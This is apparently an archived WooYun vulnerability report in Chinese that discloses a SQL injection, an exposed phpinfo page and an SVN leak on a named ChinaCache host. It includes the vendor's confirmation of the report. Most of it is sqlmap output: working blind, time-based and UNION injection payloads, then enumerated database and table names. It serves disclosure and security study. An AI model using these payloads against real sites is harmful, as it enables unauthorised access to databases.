乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-28: 细节已通知厂商并且等待厂商处理中 2015-04-28: 厂商已经确认,细节仅向厂商公开 2015-05-08: 细节向核心白帽子及相关领域专家公开 2015-05-18: 细节向普通白帽子公开 2015-05-28: 细节向实习白帽子公开 2015-06-12: 细节向公众公开
233
phpinfo : http://cda.data.chinacache.com/phpinfo.php
svn没太敏感的。但是泄露了一个地址,http://220.181.65.245:88/data/cache2/svn/public/cda/ca/script2013-11-27T04:24:45.000000Z6c0edab4dbbc8ab1b4dcd05cc2b26a092013-11-27T05:07:51.954648Z273yunpeng.donghas-props。。。。。。。。。。。。。。
SQL:http://cda.data.chinacache.com/customize.php?id=1
---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1 RLIKE (SELECT (CASE WHEN (4241=4241) THEN 1 ELSE 0x28 END)) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GUOX) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x49646b6343554d686341,0x7162717171),NULL,NULL-- ---web application technology: Nginx, PHP 5.3.19back-end DBMS: MySQL 5.0.12current user is DBA: Falseavailable databases [8]:[*] bugtracker[*] ca_data[*] ca_data_test[*] ca_data_test1[*] ca_database[*] information_schema[*] mysql[*] testDatabase: ca_data[273 tables]+---------------------------------+| user || amazon_flux_stat || area_distribution || bandwidth_stat || ca_site_channel || ca_site_channelOp || ccregion || ccregionsel || customer || customerOp || customer_tree || customize || dev_oper_base_12530 || dev_oper_base_163 || dev_oper_base_163blog || dev_oper_base_163lh || dev_oper_base_163tech || dev_oper_base_163web || dev_oper_base_17zuoye || dev_oper_base_18zuoye || dev_oper_base_37wan || dev_oper_base_Amazon || dev_oper_base_Apple || dev_oper_base_BBK || dev_oper_base_BingMapChina || dev_oper_base_KAIXIN || dev_oper_base_YC || dev_oper_base_Zhezi || dev_oper_base_aobi || dev_oper_base_app || dev_oper_base_autohome || dev_oper_base_babeltime || dev_oper_base_baidu || dev_oper_base_baidu_91 || dev_oper_base_bingmapchina || dev_oper_base_china || dev_oper_base_chinabroadcast || dev_oper_base_chinadaily || dev_oper_base_chinataiwan || dev_oper_base_dangdang || dev_oper_base_dawx || dev_oper_base_duowan || dev_oper_base_game2 || dev_oper_base_gionee || dev_oper_base_gmw || dev_oper_base_go || dev_oper_base_gov || dev_oper_base_haima || dev_oper_base_huan || dev_oper_base_ifeng || dev_oper_base_ijinshan || dev_oper_base_joyo || dev_oper_base_kaopuyun || dev_oper_base_ku6 || dev_oper_base_kunlun || dev_oper_base_lenovomm || dev_oper_base_lianwifi || dev_oper_base_mafengwo || dev_oper_base_meituan || dev_oper_base_meizu || dev_oper_base_micr || dev_oper_base_mingchao || dev_oper_base_mogujie || dev_oper_base_msn || dev_oper_base_muzhiwan || dev_oper_base_neteasewow || dev_oper_base_qunar || dev_oper_base_sina_t || dev_oper_base_sina_weibo || dev_oper_base_soufun || dev_oper_base_suning || dev_oper_base_tizi || dev_oper_base_tuan800 || dev_oper_base_tuanmei || dev_oper_base_tuniu || dev_oper_base_vipshop || dev_oper_base_xiaomi | 小米?| dev_oper_base_xiaonei || dev_oper_base_xici || dev_oper_base_xinhua || dev_oper_base_xiu8 || dev_oper_base_zhezi || dev_oper_netizen_12530 || dev_oper_netizen_163 || dev_oper_netizen_163blog || dev_oper_netizen_163lh || dev_oper_netizen_163tech || dev_oper_netizen_163web || dev_oper_netizen_17zuoye || dev_oper_netizen_18zuoye || dev_oper_netizen_37wan || dev_oper_netizen_Amazon || dev_oper_netizen_Apple || dev_oper_netizen_BBK || dev_oper_netizen_BingMapChina || dev_oper_netizen_KAIXIN || dev_oper_netizen_YC || dev_oper_netizen_Zhezi || dev_oper_netizen_aobi || dev_oper_netizen_app || dev_oper_netizen_autohome || dev_oper_netizen_babeltime || dev_oper_netizen_baidu | 百度?| dev_oper_netizen_baidu_91 || dev_oper_netizen_bingmapchina || dev_oper_netizen_china || dev_oper_netizen_chinabroadcast || dev_oper_netizen_chinadaily || dev_oper_netizen_chinataiwan || dev_oper_netizen_dangdang || dev_oper_netizen_dawx || dev_oper_netizen_duowan || dev_oper_netizen_game2 || dev_oper_netizen_gionee || dev_oper_netizen_gmw || dev_oper_netizen_go || dev_oper_netizen_gov || dev_oper_netizen_haima || dev_oper_netizen_huan || dev_oper_netizen_ifeng || dev_oper_netizen_ijinshan || dev_oper_netizen_joyo || dev_oper_netizen_kaopuyun || dev_oper_netizen_ku6 || dev_oper_netizen_kunlun || dev_oper_netizen_lenovomm || dev_oper_netizen_lianwifi || dev_oper_netizen_mafengwo | 马蜂窝?| dev_oper_netizen_meituan | 美团| dev_oper_netizen_meizu || dev_oper_netizen_micr || dev_oper_netizen_mingchao || dev_oper_netizen_mogujie || dev_oper_netizen_msn || dev_oper_netizen_muzhiwan || dev_oper_netizen_neteasewow || dev_oper_netizen_qunar || dev_oper_netizen_sina_t || dev_oper_netizen_sina_weibo || dev_oper_netizen_soufun || dev_oper_netizen_suning || dev_oper_netizen_tizi || dev_oper_netizen_tuan800 || dev_oper_netizen_tuanmei || dev_oper_netizen_tuniu || dev_oper_netizen_vipshop || dev_oper_netizen_xiaomi || dev_oper_netizen_xiaonei || dev_oper_netizen_xici || dev_oper_netizen_xinhua || dev_oper_netizen_xiu8 || dev_oper_netizen_zhezi || dev_oper_source_12530 || dev_oper_source_163 | 163?| dev_oper_source_163blog || dev_oper_source_163lh || dev_oper_source_163tech || dev_oper_source_163web || dev_oper_source_17zuoye || dev_oper_source_18zuoye || dev_oper_source_37wan || dev_oper_source_Amazon || dev_oper_source_Apple || dev_oper_source_BBK || dev_oper_source_BingMapChina || dev_oper_source_KAIXIN || dev_oper_source_YC || dev_oper_source_Zhezi || dev_oper_source_aobi || dev_oper_source_app || dev_oper_source_autohome || dev_oper_source_babeltime || dev_oper_source_baidu || dev_oper_source_baidu_91 || dev_oper_source_bingmapchina || dev_oper_source_china || dev_oper_source_chinabroadcast || dev_oper_source_chinadaily || dev_oper_source_chinataiwan || dev_oper_source_dangdang || dev_oper_source_dawx || dev_oper_source_duowan | 多万?| dev_oper_source_game2 || dev_oper_source_gionee || dev_oper_source_gmw || dev_oper_source_go || dev_oper_source_gov || dev_oper_source_haima || dev_oper_source_huan || dev_oper_source_ifeng | ifeng| dev_oper_source_ijinshan || dev_oper_source_joyo || dev_oper_source_kaopuyun || dev_oper_source_ku6 | 酷6| dev_oper_source_kunlun || dev_oper_source_lenovomm || dev_oper_source_lianwifi || dev_oper_source_mafengwo || dev_oper_source_meituan || dev_oper_source_meizu || dev_oper_source_micr || dev_oper_source_mingchao || dev_oper_source_mogujie || dev_oper_source_msn || dev_oper_source_muzhiwan || dev_oper_source_neteasewow || dev_oper_source_qunar | 去哪| dev_oper_source_sina_t | | dev_oper_source_sina_weibo | 新浪?| dev_oper_source_soufun | 搜房| dev_oper_source_suning | 苏宁| dev_oper_source_tizi || dev_oper_source_tuan800 | 团800| dev_oper_source_tuanmei || dev_oper_source_tuniu | 途牛| dev_oper_source_vipshop || dev_oper_source_xiaomi || dev_oper_source_xiaonei || dev_oper_source_xici || dev_oper_source_xinhua || dev_oper_source_xiu8 || dev_oper_source_zhezi || device_type || escape_rate || exit_page || exit_rate || fun_visitor || hot_resource || industry_stat || insertcustomer || isp || modules || net_type || new_visitors || order_conversion_path || order_conversion_rate || orderinfo || page_load_rate || page_views || people_purchase || portal_page || province || province_isp_flux || region_attribute || region_fun || region_isp || region_mobile || regiondistribute || revisitors || sogo_area_flux || sogo_http_status || sogo_url_flux || source_device || source_path || source_path_fun || splunk_alert || splunk_alert_detail || splunk_channel || splunk_exit_ratio || splunk_visit_stats || status_stat || subvisitsrate || ua_analyse || unique_visitor || visit_depth || visit_page || visit_page_copy || visit_rate || visit_time || visitor_path_site || visitors_loss_rate || visitors_path || website_stay_time |+---------------------------------+这些表是干什么的?幸好。。Database: ca_data_test+-----------------------+---------+| Table | Entries |+-----------------------+---------+| ca_site_channel | 40640 || region_mobile | 36850 || people_purchase | 29856 || visitor_path_site | 7418 || hot_resource | 2880 || province_isp_flux | 2558 || area_distribution | 2378 || ua_analyse | 1109 || industry_stat | 818 || bandwidth_stat | 720 || exit_page | 720 || exit_rate | 720 || page_load_rate | 720 || region_attribute | 720 || region_fun | 720 || source_path_fun | 720 || visit_page | 720 || dev_oper_base_micr | 718 || region_isp | 709 || portal_page | 708 || regiondistribute | 686 || subvisitsrate | 329 || fun_visitor | 254 |
还有几个bak,看了下,没发现敏感信息。
~~~
危害等级:高
漏洞Rank:13
确认时间:2015-04-28 16:10
非常感谢您的反馈,正在修复中。
2015-04-29:系统已经关闭
